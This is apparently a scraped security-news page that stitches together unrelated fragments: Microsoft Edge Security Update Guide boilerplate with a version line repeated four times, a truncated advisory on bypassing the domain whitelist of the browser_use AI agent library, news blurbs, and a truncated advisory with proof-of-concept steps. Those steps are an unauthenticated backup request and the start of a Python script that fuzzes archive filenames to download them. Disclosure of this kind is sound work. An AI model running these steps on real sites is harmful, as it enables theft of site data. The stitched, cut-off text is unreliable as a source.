#chrome

**Why is this Chrome CVE included in the Security Update Guide?** The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. **How can I see the version of the browser?** 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window 2. Click on **Help and Feedback** 3. Click on **About Microsoft Edge**

### Summary During a manual source code review, [**ARIMLABS.AI**](https://arimlabs.ai) researchers identified that the `browser_use` module includes an embedded whitelist functionality to restrict URLs that can be visited. This restriction is enforced during agent initialization. However, it was discovered that these measures can be bypassed, leading to severe security implications. ### Details **File:** `browser_use/browser/context.py` The `BrowserContextConfig` class defines an `allowed_domains` list, which is intended to limit accessible domains. This list is checked in the `_is_url_allowed()` method before navigation: ```python @dataclass class BrowserContextConfig: """ [STRIPPED] """ cookies_file: str | None = None minimum_wait_page_load_time: float = 0.5 wait_for_network_idle_page_load_time: float = 1 maximum_wait_page_load_time: float = 5 wait_between_actions: float = 1 disable_security: bool = True browser_window_size: Browse...

Passwords are becoming things of the past. Passkeys are more secure, easier to manage, and speed up the log in process

**What is the version information for this release?** Microsoft Edge Version Date Released Based on Chromium Version 136.0.3240.50 5/1/2025 136.0.7103.49

**What is the version information for this release?** Microsoft Edge Version Date Released Based on Chromium Version 136.0.3240.50 5/1/2025 136.0.7103.49

**What is the version information for this release?** Microsoft Edge Version Date Released Based on Chromium Version 136.0.3240.50 5/1/2025 136.0.7103.49

**What is the version information for this release?** Microsoft Edge Version Date Released Based on Chromium Version 136.0.3240.50 5/1/2025 136.0.7103.49

Cybercriminals are having less success targeting end-user technology with zero-day attacks, said Google's security team this week.

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

### Summary The request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication. The archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated. ### Details Create an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for: ``` POST /?api/archives HTTP/1.1 Host: localhost:8085 action=startArchive&params%5Bsavefiles%5D=true&params%5Bsavedatabase%5D=true&callAsync=true ``` Then to retrieve it, make a simple `GET` request like to the correct URL: ``` http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip ``` A malicious attacker could simply fuzz this filename. ### PoC Here is a python script to fuzz this: ``` #!/usr/bin/env python3 import requests import argpars...